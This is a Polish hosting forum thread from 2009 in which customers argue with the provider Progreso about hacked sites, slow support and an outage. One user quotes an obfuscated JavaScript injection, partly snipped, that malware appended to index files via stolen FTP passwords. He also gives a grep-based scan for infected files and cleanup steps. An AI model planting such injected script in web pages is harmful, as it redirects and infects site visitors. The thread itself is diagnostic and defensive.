regdos 1848 Zgłoś post Napisano Luty 12, 2009 Proszę tylko wytłumaczyć czemu u innych providerów nie występują tego typu usterki ?Na dokładnie tych samych wersjach joomla ! Inne dodatki zainstalowane, ktoś wyjątkowo lubi Twoją stronę atakować, inne prawa plików, faktyczna inny konfiguracja serwera (ale to i tak włam ma miejsce przez joomle a nie przez serwer i winna jest temu joomla) Ponadto jak wspomniałem włamania dokonywane są także na strony html a nie tylko na strony cms-a.Czy tym tokiem mam nie używać html ? To normalne bo jeżeli te same prawa użytkownika odnoszą się do serwisu joomla jak i do innych katalogów to skrypt uruchomiony z prawami takimi jak joomla może sobie pobuszowaćć i pozmieniać pliki na innych serwisach. Udostępnij ten post Link to postu Udostępnij na innych stronach
error_404 0 Zgłoś post Napisano Luty 12, 2009 Proszę o radę co z tym zrobić ? Zmień jak najszybciej hosting na inną firmę. Obojętne jaką. Byle nie progreso. Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość adamszendzielorz Zgłoś post Napisano Luty 16, 2009 OK.Proszę tylko wytłumaczyć czemu u innych providerów nie występują tego typu usterki ? Na dokładnie tych samych wersjach joomla ! Juz otrzymales na ten temat odpowiedz -> u nas masz register_globals ustawione na "On", co drastycznie zmniejsza bezpieczenstwo tego skryptu. Kwestia jednego wpisu w pliku php.ini. "Wlamy" nie maja nic wspolnego z bezpieczenstwem serwera - chodzi o dziurawa wersje Twojej Joomli. Niestety decydujac sie na uzywanie oprogramowania typu Open Source, trzeba przynajmniej raz na kilka dni sledzic aktualizacje, a najlepiej jezeli dany soft posiada - zapisac sie na grupe mailowa z informacjami o aktualizacjach. Otwierajac zlodziejowi drzwi do domu na osciez, bedziesz winil producenta drzwi, jak Cie okradna ? pozdr. Udostępnij ten post Link to postu Udostępnij na innych stronach
Dariusz Cieślak 3 Zgłoś post Napisano Luty 16, 2009 Od kilku dni na serwerze progreso dokonywane są włamania i podmienianie stron index.php lub index.html tzn dopisywanie skryptu przekierowującego na stronę dvcd.info.Zgłaszałem to do tzw. supportu i dowiedziałem się że to luki w cms joomla ( to rozumiem ) ale takie same włamania dokonywane są na plikach html będących w innych katalogach powyżej joomla. Ponadto na innych serwerach na których mam serwisy na joomla ( te same wersje ) włamania nie są dokonywane ( home.pl , nazwa.pl ) czyli chyba wina leży po stronie usługodawcy - tzn. jego zabezpieczeń lub raczej braku takowych. Niech zgadnę: pojawia się mniej więcej taki wpis:<script language="JavaScript">function rkfg(jflq){return String.fromCharCode(jflq);}var ohhe="060105102114097109101032115114099061039104116116 (few lines snipped) 2105803210410510010010111005903906206004710510211 4097109101062";var ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3) {ifdm+=rkfg(ohhe.substr (qhxk, 3));}window.status='Done'; document.write(ifdm);</script> Usunąłem tego wirusa niedawno u mojego klienta i zdiagnozowałem źródło jako wyciek haseł FTP. Wirus na maszynie webmastera przechwycił hasła do FTP i wysłał je na zewnętrzny serwer. Po jakimś czasie nastąpiło połączenie FTP spoza Europy w czasie którego: nastąpiło skanowanie konta w poszukiwaniu plików *.php *.html dla każdego znalezionego pliku: DOWNLOAD / UPLOAD widoczna w transfer.log serwera FTP Sposób usunięcia wirusa: Wywalić wirusy ze stacji roboczych Zmiana haseł FTP dla wszystkich kont Przeskanowanie konta w poszukiwaniu zainfekowanych plików W moim przypadku skanowanie wygląd tak (skrypt CGI na serwerze): #!/bin/shecho Content-type: text/plain echo ( find . -name \*.html -o -name \*.php | xargs grep "" ) 2>&1 am123, proponuję zajrzeć do logów serwera FTP - jeśli znajdziesz tam podejrzane sekwencje DOWNLOAD/UPLOAD łatanie Joomli i zwalanie na progreso niewiele pomoże. Daj znać o wynikach śledztwa (sam jestem ciekawy jaki mechanizm włamu zadziałał u ciebie). Udostępnij ten post Link to postu Udostępnij na innych stronach
am123 0 Zgłoś post Napisano Luty 16, 2009 Dziękuję... Wreszcie coś konstruktywnego. Wykonałem część założeń z postu - czekam na efekty. W takim bądź razie wyciek haseł FTP jest po czyjej stronie ? Providera czy dziurawego skryptu cms ? Udostępnij ten post Link to postu Udostępnij na innych stronach
regdos 1848 Zgłoś post Napisano Luty 16, 2009 W takim bądź razie wyciek haseł FTP jest po czyjej stronie ? Providera czy dziurawego skryptu cms ? A przeczytałeś ze zrozumieniem to co Ci Dariusz Cieślak napisał ? Wyciek haseł jest po stronie komputerów klienckich !! Co nie ma nic wspólnego z Provaiderem i z cms-em. Udostępnij ten post Link to postu Udostępnij na innych stronach
Dariusz Cieślak 3 Zgłoś post Napisano Luty 16, 2009 Na początek errata: find . -name \*.html -o -name \*.php | xargs grep ""Tu edytor wyciął mi fragment, powinno być: find . -name \*.html -o -name \*.php | xargs grep "<!-- ad -->"W takim bądź razie wyciek haseł FTP jest po czyjej stronie ? Providera czy dziurawego skryptu cms ?Nie wiem jak jest u ciebie. Na serwerze nie miałem Joomli (tym bardziej niezałatanej) - u mnie podejrzewam wyciek z wirusa na stacji roboczej (keylogger lub wyłuskanie zapisaneych haseł do FTP). Tym bardziej, że wirus skopiował się także na inne serwery do których był dostęp z tego komputera. Czy są jakieś wyniki z analizy logów FTP? Więcej szczegółów na temat wirusa: tutaj. Udostępnij ten post Link to postu Udostępnij na innych stronach
am123 0 Zgłoś post Napisano Marzec 10, 2009 Efekty: Okazało się ( zgodnie z w.w. sugestiami ) że wirus był w komputerze stacjonarnym ( moim ), wykradał hasła do ftp, łączył się i na index-y php i html doklejał złośliwy kod. Czyli wina nie leżała po stronie usługodawcy, jednak sposób w jaki się o tym dowiedziałem czyli tydzień walki bez odpowiedzi lub chyba z jedną żebym był dokładny - że to wina dziurawych skryptów - przekonał mnie że SUPPORT to najważniejsza rzecz po jakości usług - czasem nawet odwrotnie. Tutaj w skali ocen 1-10 support mogę ocenić na 2-3. W sumie odpowiedzieli ale nie wniosło to kompletnie nic w mój problem jako klienta - choć wina leżała jak się okazało po mojej stronie a dokładnie stronie na którą wszedłem z zainfekowanym hackiem. Tego hacka wykrywa tylko google chrom i blokuje stronę, inne przeglądarki czytają takie strony i psuja się bez problemów. Gdyby ktoś miał podobne symptomy radzę: usunąć zapisane hasła w programach ftp, zmienić hasła, przeinstalować system i używać haseł z palca ;-) Udostępnij ten post Link to postu Udostępnij na innych stronach
mr.suchy 0 Zgłoś post Napisano Marzec 10, 2009 moze troche zrobie OF ale musze jak czytam ostatni post Pana @am123. Radze zainstalowac program antywirusowy, firewall. SUPPORT firmy Progreso nie ochroni Pana @am123 przed zlapaniem wirusa. Radze wszystkim, przed napisanie postu (negatywnego) na temat usulg jakiekolwiek firmy, zastanowic sie. Nie sluchaj w 100% odpowiedz uzytkownikow z forum joomla, wordpress pt. "To wina hostingu"...zastanowic sie. Podziwiam @adamszendzielorz za nerwy na wodzy. Pozdrawiam Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość RuFiK Zgłoś post Napisano Marzec 10, 2009 Witam, Ja tez mialem problem z wirusem ktory podmienial mi indexa Lekarstwo - zmiana hasla na glowne konto FTP - zakupienie kasp IS 2009 i pelny skan systemu i mojego intranetu (w moim przypadku) pzdr Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość adamszendzielorz Zgłoś post Napisano Marzec 11, 2009 Podziwiam @adamszendzielorz za nerwy na wodzy. Obslugujac helpdesk przez te kilka lat przyzwyczailem sie, ze niektorzy wieszaja na nim psy tylko dlatego, ze jest akurat pod reka, a ktos ma zly dzien :-) Nerwy trzymam na boku - to robota jak kazda inna. Jest problem - trzeba go rozwiazac i to wszystko Bzikofski: pusc zgloszenie w helpdesku, jestes na slabo obciazonej maszynie (obecnie juz nie mamy innych ;-) i wszystko powinno chulac szybko. pozdr. Udostępnij ten post Link to postu Udostępnij na innych stronach
g00rek 0 Zgłoś post Napisano Maj 13, 2009 Czytając pozytywne opinie w tym wątku i przeglądając jednocześnie opinie na tematy innych providerów zdecydowałem się na hosting w progreso. Chciałem jednakże spytać czy obciążenie kilkoma wp i eksperyentalną joomlą czy dwoma nie będzie problemem dla takiego konta (odwiedziny <200 uu dziennie). Druge pytanie o wersję MySQL 5.2.3 kiedy się pojawi. Niestety już na starcie zniechęcenie infolinia - 2 minut oczekiwanua (poddałem się), na odpowiedź mailową czekam już prawie 24h Z superhosta uciekam tylko ze względu na rzekome "przeciążenie serwera" (czym????), ale kurcze helpdesk przynajmniej odpowiada na maile w ciągu godziny Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość Zgłoś post Napisano Maj 13, 2009 2-3 lata temu napisałbym "bierz".. dzisiaj napiszę: czy naprawdę chcesz przejść "z deszczu pod rynnę"?... Udostępnij ten post Link to postu Udostępnij na innych stronach
g00rek 0 Zgłoś post Napisano Maj 13, 2009 2-3 lata temu napisałbym "bierz".. dzisiaj napiszę: czy naprawdę chcesz przejść "z deszczu pod rynnę"?... Ech no to już nie wiem. Coś co kosztuje <400 pln miesięcznie, nie dławi go kilka wordpressów i joomli, ma dobry panel (instalatory, dodawanie domen, itp), ma dobry helpdesk i nie pada co chwilę, ma dobrą prędkość... A może ja marzę? Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość Zgłoś post Napisano Maj 13, 2009 Jeśli Ci się chce, to machnij mi mejla milosz@epoczta.pl lub GG 901 974 - podpytam to i owo i podzielę się najnowszymi newsami gdzie warto się zahościć : ) Udostępnij ten post Link to postu Udostępnij na innych stronach
g00rek 0 Zgłoś post Napisano Maj 13, 2009 Dzięki, ale chyba się zdecydowałem. Nie będe mówił gdzie bo mi serwer zapchacie Udostępnij ten post Link to postu Udostępnij na innych stronach
spokeros 0 Zgłoś post Napisano Czerwiec 21, 2009 kolega error_404 najlepiej opisał aktualną sytuację w progreso kiedyś było nieźle, żeby nie powiedzieć bardzo dobrze albo nawet super ale to było kiedyś aktualnie hosting w progreso zszedł na psy ja osobiście za najgorszą rzecz uważam zamulone serwery i całkowity brak supportu mam konto w progreso trzeci rok, ale już więcej nie przedłuże, zastanawiam się nawet czy teraz nie zerwać umowy beobsługowy hosting można mieć za darmo za pieniądze można już czegoś wymagać - dysproporcja pomiędzy ceną a jakością obsługi w progreso jest aktualnie ogromna można powiedzieć że jest cena a nie ma obsługi ostatnio miałem mały problem, dzwoniłem chyba 4 razy, zapewniano mnie że owszem zaraz naprawią, ale mam zgłosić to przez helpdesk - zgłosiłem, ticket wisi już tydzień i nic, wielkie nic - czyli klasyka, jak już niejedna osoba pisała szczerze odradzam zakup hostingu w tej firmie, można tylko naprężyć sobie nerwy i nic więcej wg mnie wielkie nieporozumienie Pan Szendzielorz pisze, że firmę prowadzi już 10 lat i "coś tam" już wie drogi Panie "coś tam" to o wiele za mało by mówić o profesjonalizmie poleciłem firmę wielu znajomym, teraz zarządzam odwrót... Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość RuFiK Zgłoś post Napisano Sierpień 6, 2009 hmm jakies problemy z poczta via www ... Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość adamszendzielorz Zgłoś post Napisano Sierpień 9, 2009 czyżby jakis padzik?bo sie nie moge zaeftepować ani na strone wejsc.. edit: o juz funga Padl nam glowny serwer DNS + extranetu + bazodanowy, z ktorego korzystaja praktycznie wszystkie maszyny "wewnetrznie", po LANie -> szkoda, bo szlismy z nim na rekord uptime'u, ktory wynosil juz blisko 500 dni :-) Przez to nie dzialal do konca wlasnie webmail, FTP, extranet no i nasza strona glowna. Problem zostal szybko rozwiazany. pozdr. Udostępnij ten post Link to postu Udostępnij na innych stronach
Hogollo 0 Zgłoś post Napisano Sierpień 13, 2009 Co się dzieje z rejestracją na Progreso?!?! Od trzech dni chcę zarejestrować serser Biznes Plus i za każdym razem na samym końcu ostatniej strony rejestracji dostaje komunikat.: "Błąd komunikacji..." i coś tam. Zgłosiłem do helpdeska dokładny opis problemu i nic, dzwonie i dzwonie i tez nikt nie odbiera. Klient się niecierpliwi.... Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość Zgłoś post Napisano Sierpień 13, 2009 Chyba logiczne jest co zrobić w takim wypadku ; )))P Udostępnij ten post Link to postu Udostępnij na innych stronach
Linux 0 Zgłoś post Napisano Sierpień 13, 2009 Zmienić firmę ? . Udostępnij ten post Link to postu Udostępnij na innych stronach
Hogollo 0 Zgłoś post Napisano Sierpień 13, 2009 Panowie nie o to chodzi. W normalnym przypadku zapewne bym tak zrobił ale mam nietypową sytuację. Sam już jestem klientem Progreso i patrząc na niektóre wpisy (o dziwo) nie mogę na nich narzekać. Naprawdę. Sytuacja jest taka, że mam klienta i postawiłem mu pewien serwis, który np. na home.pl się sypał (z całym szacunkiem dla home.pl). Zainstalowałem wszystko u siebie na koncie (czyli na Progreso), pomodyfikowałem itd. i wiem, że chodzi bez bólu. Ale nie chcę klienta serwisu trzymać u siebie. Więc klient chciał sobie założyć serwer na Progreso no i kaszanka... nawet mi trochę głupio przed klientem bo wcześniej nie miałem problemów z supportem Może przeczyta to ktoś z Progreso. Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość RuFiK Zgłoś post Napisano Sierpień 13, 2009 Napisz do Adama na meila to migiem problem zostanie rozwiazany pzdr. Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość Zgłoś post Napisano Sierpień 13, 2009 A ja bym brał od nich manatki.. "za karę".. za duża konkurencja jest na rynku, żeby takie jaja robić.. żeby konta nie można było zamówić? phhhhhhhhhhh.... Udostępnij ten post Link to postu Udostępnij na innych stronach